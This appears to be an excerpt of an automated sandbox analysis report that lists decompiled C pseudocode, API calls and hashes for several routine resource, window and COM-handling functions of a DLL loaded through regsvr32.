Opcode Fuzzy Hash: 056738f1dbb01ff9727d5d93c506c385d49c7b0d9dd5cda1d16c97d0f571fc3e
Instruction Fuzzy Hash: 23014B70940109FBEF42DF64ED85AAE3AEAEB16380F504520FD02D81E0D776CAE0CA51

Uniqueness

Uniqueness Score: -1.00%

Function 100175A3 Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100175A3(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E1001715A(_t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1001E302(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

0x100175a7
0x100175a9
0x100175ab
0x100175af
0x100175b1
0x100175e6
0x100175f0
0x100175f2
0x100175f9
0x100175f9
0x00000000
0x100175ff
0x100175b8
0x100175c5
0x100175cd
0x00000000
0x00000000
0x100175d1
0x100175d7
0x100175db
0x100175e4
0x00000000
0x100175e4
0x10017605

APIs

FindResourceA.KERNEL32 ref: 100175C5
LoadResource.KERNEL32(?,00000000,?,?,?,?,1001BAC6,?,?,1000853E,6FB3F782), ref: 100175D1
LockResource.KERNEL32(00000000,?,?,?,?,1001BAC6,?,?,1000853E,6FB3F782), ref: 100175DE
FreeResource.KERNEL32(00000000,?,?,?,?,1001BAC6,?,?,1000853E,6FB3F782), ref: 100175F9

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 3aaac21b0ef2c8b63035e737b3131aca2a8ee90a1bb553a8d0e70c6f11b13852
Instruction ID: 7948c032a4c72716df5e771d6e8d2f206c4fca0a3d528dd7194fd61f1b252fe8
Opcode Fuzzy Hash: 3aaac21b0ef2c8b63035e737b3131aca2a8ee90a1bb553a8d0e70c6f11b13852
Instruction Fuzzy Hash: 1AF0903A2006216FD3019B664C88A7BBABDFFC66E27050079FE08D7251DE75CD4186B1

Uniqueness

Uniqueness Score: -1.00%

Function 1001C001 Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E1001C001(intOrPtr __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				struct HINSTANCE__* _t23;

				_t18 = __edx;
				_push(__ecx);
				_push(_t22);
				_push(_t19);
				_v8 = __ecx;
				_t14 = 0;
				_t23 =  *(E1001E302(0, _t19, _t22, __eflags) + 0xc);
				_t20 = LoadResource(_t23, FindResourceA(_t23, _a4, 5));
				_t27 = _t20;
				if(_t20 != 0) {
					_t14 = LockResource(_t20);
				}
				_t9 = E1001BC23(_t14, _v8, _t18, _t20, _t23, _t27, _t14, _a8, _t23);
				FreeResource(_t20);
				return _t9;
			}

0x1001c001
0x1001c004
0x1001c006
0x1001c007
0x1001c008
0x1001c00b
0x1001c012
0x1001c029
0x1001c02b
0x1001c02d
0x1001c036
0x1001c036
0x1001c040
0x1001c048
0x1001c054

APIs

FindResourceA.KERNEL32 ref: 1001C01B
LoadResource.KERNEL32(?,00000000), ref: 1001C023
LockResource.KERNEL32(00000000), ref: 1001C030
FreeResource.KERNEL32(00000000,00000000,?,?), ref: 1001C048

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 827473ef3e72b1209851eb1e6ca0238e8683fc6564f1af58fdf33cb5959af9ad
Instruction ID: 17b7ca83f3fe0b1c6abb568bf059af7570cb479962814bbe8024a2d76e27436e
Opcode Fuzzy Hash: 827473ef3e72b1209851eb1e6ca0238e8683fc6564f1af58fdf33cb5959af9ad
Instruction Fuzzy Hash: 0AF05E3A600624BFD7019BA98D8DDDFBBACEF5B6A17044095FA0597211DA79DE008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 100259DA Relevance: 6.0, APIs: 4, Instructions: 32
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E100259DA(short* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t13;
				void* _t15;
				void* _t18;
				void* _t23;
				intOrPtr _t25;
				short* _t27;
				void* _t28;

				_t23 = __edx;
				_t19 = __ecx;
				_t13 = E1004764D(0x1008f9c8, _t18, __edi, __esi);
				_t27 = __ecx;
				__imp__#9(__ecx, 0x224);
				_t25 =  *((intOrPtr*)(_t28 + 8));
				 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				 *__ecx = 8;
				if(_t25 != 0) {
					_push(_t25);
					if( *((short*)(_t28 + 0xc)) != 0xe) {
						L4:
						_t15 = E10025809(_t18, _t28 - 0x230, _t25, _t27, _t32);
						_t7 = _t28 - 4;
						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
						_t9 = _t15 + 0xc; // 0xc
						 *(_t27 + 8) = L10024C7E(_t18, _t9, _t23, _t25, _t27);
						_t13 = E10025299(_t18, _t28 - 0x230,  *_t7);
					} else {
						_t13 = lstrlenA();
						__imp__#150(_t25, _t13);
						_t32 = _t13;
						 *(_t27 + 8) = _t13;
						if(_t13 == 0) {
							E1000A035(_t18, _t19, _t25, _t27, _t32);
							goto L4;
						}
					}
				}
				return E10047725(_t13);
			}

0x100259da
0x100259da
0x100259e4
0x100259e9
0x100259ec
0x100259f2
0x100259f5
0x100259fb
0x10025a00
0x10025a07
0x10025a08
0x10025a24
0x10025a2a
0x10025a2f
0x10025a2f
0x10025a33
0x10025a41
0x10025a44
0x10025a0a
0x10025a0a
0x10025a12
0x10025a18
0x10025a1a
0x10025a1d
0x10025a1f
0x00000000
0x10025a1f
0x10025a1d
0x10025a08
0x10025a4e

APIs

__EH_prolog3.LIBCMT ref: 100259E4
VariantClear.OLEAUT32 ref: 100259EC
lstrlenA.KERNEL32(?,?,?,?,00000224), ref: 10025A0A
SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 10025A12

Part of subcall function 1000A035: __CxxThrowException@8.LIBCMT ref: 1000A049

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocByteClearException@8H_prolog3StringThrowVariantlstrlen
String ID:
API String ID: 103272278-0
Opcode ID: a03163d6efae831f1220c955f7c88dcc41e9ab63c78cc7d2f5363c402911c247
Instruction ID: a60bc55f71c44e27e2e3c2ff32b84eedb9fa8c598236bbb949332012621262c7
Opcode Fuzzy Hash: a03163d6efae831f1220c955f7c88dcc41e9ab63c78cc7d2f5363c402911c247
Instruction Fuzzy Hash: 56F0C2358102009FE710EFA0D88A79DB3F4FF51352F61844CF44696161EFB8AA84CB16

Uniqueness

Uniqueness Score: -1.00%

Function 1001BF72 Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001BF72() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E10017979(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E1001B96C(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E10047725(_t16);
			}

0x1001bf72
0x1001bf75
0x1001bf7d
0x1001bf83
0x1001bf83
0x1001bf8b
0x1001bf92
0x1001bf92
0x1001bf9b
0x1001bf9d
0x1001bfa3
0x1001bfa6
0x1001bfab
0x1001bfab
0x1001bfa6
0x1001bfb5
0x1001bfba
0x1001bfc2
0x1001bfc7
0x1001bfc7
0x1001bfcd
0x1001bfd5

APIs

EnableWindow.USER32(?,00000001), ref: 1001BF92
GetActiveWindow.USER32 ref: 1001BF9D
SetActiveWindow.USER32(?), ref: 1001BFAB
FreeResource.KERNEL32(?,?,00000024,10002FE0,0000035C), ref: 1001BFC7

Part of subcall function 10017979: EnableWindow.USER32(?,?), ref: 10017986

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: f401b38f590cd6103beac2c03769a77f2c2e0e13847f51a37e67072dcf924825
Instruction ID: 2dfd2c675befebd13602439ac80d080b0f4b14b99b8caaf01a23d8a7659fb49f
Opcode Fuzzy Hash: f401b38f590cd6103beac2c03769a77f2c2e0e13847f51a37e67072dcf924825
Instruction Fuzzy Hash: 78F0FF34900A14CBDF11DB64CD8559DB7F1FF48742F600569E542761A1D732AD81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 10044171 Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10044171(void* __ebx, void* __ecx, void* __eflags) {
				signed int _t8;
				int _t9;
				void* _t12;
				void* _t13;
				signed int* _t14;
				void* _t15;

				_t11 = __ecx;
				_t13 = __ecx;
				E10043DEE(__ecx, __eflags, 1);
				ReleaseCapture();
				_t12 = E10013FEA(__ebx, _t11, _t15, GetDesktopWindow());
				LockWindowUpdate(0);
				_t14 = _t13 + 0x84;
				_t8 =  *_t14;
				if(_t8 != 0) {
					_t9 = ReleaseDC( *(_t12 + 0x20),  *(_t8 + 4));
					 *_t14 =  *_t14 & 0x00000000;
					return _t9;
				}
				return _t8;
			}

0x10044171
0x10044175
0x10044177
0x1004417c
0x10044190
0x10044192
0x10044198
0x1004419e
0x100441a2
0x100441aa
0x100441b0
0x00000000
0x100441b0
0x100441b5

APIs

Part of subcall function 10043DEE: GetStockObject.GDI32(00000000), ref: 10043E04
Part of subcall function 10043DEE: InflateRect.USER32 ref: 10043E9D

ReleaseCapture.USER32 ref: 1004417C
GetDesktopWindow.USER32 ref: 10044182
LockWindowUpdate.USER32(00000000), ref: 10044192
ReleaseDC.USER32(?,?), ref: 100441AA

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
String ID:
API String ID: 1260764132-0
Opcode ID: 487d8e1f1d22c55ea9116bb0c082156a6a80de7b46ba3d7d2777d51c7725f6e5
Instruction ID: 30137e4151670ee796189177492b211ccbe665d0b2e8e252d8abed00b3cce6c8
Opcode Fuzzy Hash: 487d8e1f1d22c55ea9116bb0c082156a6a80de7b46ba3d7d2777d51c7725f6e5
Instruction Fuzzy Hash: D2E04F36900221ABEB206B75DD4DF857BA4FF41352F164474F545CB0B1CE76D8A0CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1003BB79 Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E1003BB79(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t13;

				_t14 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x100bdee8;
					if( *0x100bdee8 == 0) {
						_t5 = GetTickCount();
						 *0x100bdee8 =  *0x100bdee8 + 1;
						__eflags =  *0x100bdee8;
						 *0x100b9a80 = _t5;
					}
					_t4 = GetTickCount() -  *0x100b9a80;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x100b9a80 = _t4;
					}
					return _t4;
				}
				return E1003BB22(_t7, _t8, _t9, _t13, _t14, _a8);
			}

0x1003bb79
0x1003bb7e
0x1003bb8b
0x1003bb99
0x1003bb9b
0x1003bb9d
0x1003bb9d
0x1003bba3
0x1003bba3
0x1003bbaa
0x1003bbb0
0x1003bbb5
0x1003bbb7
0x1003bbbd
0x1003bbbf
0x1003bbbf
0x00000000
0x1003bbc4
0x00000000

APIs

GetTickCount.KERNEL32 ref: 1003BB9B
GetTickCount.KERNEL32 ref: 1003BBA8
CoFreeUnusedLibraries.OLE32 ref: 1003BBB7
GetTickCount.KERNEL32 ref: 1003BBBD

Part of subcall function 1003BB22: CoFreeUnusedLibraries.OLE32 ref: 1003BB66
Part of subcall function 1003BB22: OleUninitialize.OLE32 ref: 1003BB6C

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: 3af299c7df0d54441f7949af5ec22983bfc3968e9bc5e5849aa0150a3ab0181d
Instruction ID: 8eba64989bf9d3bfc4ba9ed942be2444cb3907f9553e26a8a35902e1a4101070
Opcode Fuzzy Hash: 3af299c7df0d54441f7949af5ec22983bfc3968e9bc5e5849aa0150a3ab0181d
Instruction Fuzzy Hash: 28E0ED358145358FE351FB64CCC4689BBE4FB8631AF104A67E1529A468CBB05881DA92

Uniqueness

Uniqueness Score: -1.00%

Function 1003068C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E1003068C(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t118;
				intOrPtr* _t122;
				signed int _t138;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t187;

				_t186 = __ecx;
				_t146 = 0;
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					__eflags =  *(__ecx + 0x40);
					if( *(__ecx + 0x40) == 0) {
						L9:
						_t149 = 0;
						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
						 *(_t186 + 0x38) = _t146;
						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
							L12:
							_t103 =  *(_t186 + 0x38);
							__eflags = _t103 - _t146;
							if(__eflags > 0) {
								_t176 = 0x30;
								_t172 = _t103 * _t176 >> 0x20;
								_t167 =  ~(__eflags > 0) | _t103 * _t176;
								 *((intOrPtr*)(_t186 + 0x3c)) = E10009F14( ~(__eflags > 0) | _t103 * _t176, _t167);
							}
							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
							_v12 = _t146;
							_v16 = _t146;
							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
								L21:
								_t150 =  *(_t186 + 0x38);
								_t104 =  *((intOrPtr*)(_t186 + 8));
								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
								_t106 =  *(_t186 + 0x38);
								__eflags = _t106 - _t146;
								if(__eflags != 0) {
									_t174 = 0x10;
									_t156 =  ~(__eflags > 0) | _t106 * _t174;
									 *(_t186 + 0x40) = E10009F14( ~(__eflags > 0) | _t106 * _t174, _t156);
								}
								__eflags =  *(_t186 + 0x38) - _t146;
								if( *(_t186 + 0x38) <= _t146) {
									L26:
									E1002FDB9(_t186);
									return  *((intOrPtr*)( *_t186 + 0x10))();
								} else {
									_t182 = 0;
									__eflags = 0;
									do {
										E10049170(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
										_t187 = _t187 + 0xc;
										_t146 = _t146 + 1;
										_t182 = _t182 + 0x10;
										__eflags = _t146 -  *(_t186 + 0x38);
									} while (_t146 <  *(_t186 + 0x38));
									goto L26;
								}
							} else {
								_v8 = _t146;
								do {
									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
									__eflags = _t118 - _t146;
									_v20 = _t118;
									if(_t118 == _t146) {
										goto L20;
									}
									_t184 = _v12 * 0x30;
									__eflags = _t184;
									do {
										_t122 = E10012115( &_v20);
										E1002D337(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
										_v12 = _v12 + 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
										_t184 = _t184 + 0x30;
										__eflags = _v20;
									} while (_v20 != 0);
									_t146 = 0;
									__eflags = 0;
									L20:
									_v16 = _v16 + 1;
									_v8 = _v8 + 0x28;
									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
								goto L21;
							}
						}
						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
						__eflags = _t138;
						do {
							_t177 =  *_t138;
							_t172 =  *(_t177 + 0xc);
							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
							_t149 = _t149 + 1;
							_t138 = _t138 + 0x28;
							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
						goto L12;
					}
					_t185 = 0;
					__eflags =  *(__ecx + 0x38);
					if( *(__ecx + 0x38) <= 0) {
						L8:
						 *(_t186 + 0x40) = _t146;
						goto L9;
					}
					_v12 = 0;
					do {
						__imp__#9( *(__ecx + 0x40) + _v12);
						_v12 = _v12 + 0x10;
						_t185 = _t185 + 1;
						__eflags = _t185 -  *(__ecx + 0x38);
					} while (_t185 <  *(__ecx + 0x38));
					__eflags =  *(__ecx + 0x38);
					if(__eflags > 0) {
						_push( *(__ecx + 0x40));
						E10009F3F(0, _t185, __ecx, __eflags);
						_push( *((intOrPtr*)(_t186 + 0x3c)));
						E10009F3F(0, _t185, _t186, __eflags);
					}
					goto L8;
				}
				E1002FDB9(__ecx);
				return  *((intOrPtr*)( *__ecx + 0x10))();
			}

0x10030694
0x10030696
0x1003069b
0x100306ae
0x100306b2
0x100306ef
0x100306ef
0x100306f1
0x100306f4
0x100306f7
0x10030710
0x10030710
0x10030713
0x10030715
0x1003071b
0x1003071c
0x10030723
0x1003072c
0x1003072c
0x1003072f
0x10030732
0x10030735
0x10030738
0x100307e2
0x100307e2
0x100307e5
0x100307f6
0x100307f9
0x100307fc
0x100307fe
0x10030804
0x1003080c
0x10030815
0x10030815
0x10030818
0x1003081b
0x10030842
0x10030844
0x00000000
0x1003081d
0x1003081d
0x1003081d
0x1003081f
0x10030829
0x10030831
0x10030836
0x10030839
0x1003083a
0x1003083d
0x1003083d
0x00000000
0x1003081f
0x1003073e
0x1003073e
0x10030741
0x1003074b
0x1003074e
0x10030750
0x10030753
0x00000000
0x00000000
0x10030758
0x10030758
0x1003075b
0x10030769
0x1003077f
0x1003078d
0x10030794
0x1003079c
0x100307a4
0x100307ac
0x100307af
0x100307c0
0x100307c4
0x100307c7
0x100307c7
0x100307cd
0x100307cd
0x100307cf
0x100307cf
0x100307d5
0x100307d9
0x100307d9
0x00000000
0x10030741
0x10030738
0x100306fc
0x100306fc
0x100306ff
0x100306ff
0x10030701
0x10030704
0x10030707
0x10030708
0x1003070b
0x1003070b
0x00000000
0x100306ff
0x100306b4
0x100306b6
0x100306b9
0x100306ec
0x100306ec
0x00000000
0x100306ec
0x100306bb
0x100306be
0x100306c5
0x100306cb
0x100306cf
0x100306d0
0x100306d0
0x100306d5
0x100306d8
0x100306da
0x100306dd
0x100306e2
0x100306e5
0x100306eb
0x00000000
0x100306d8
0x1003069d
0x00000000

APIs

VariantClear.OLEAUT32(?), ref: 100306C5

Strings

(, xrefs: 100307D5

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ClearVariant
String ID: (
API String ID: 1473721057-3887548279
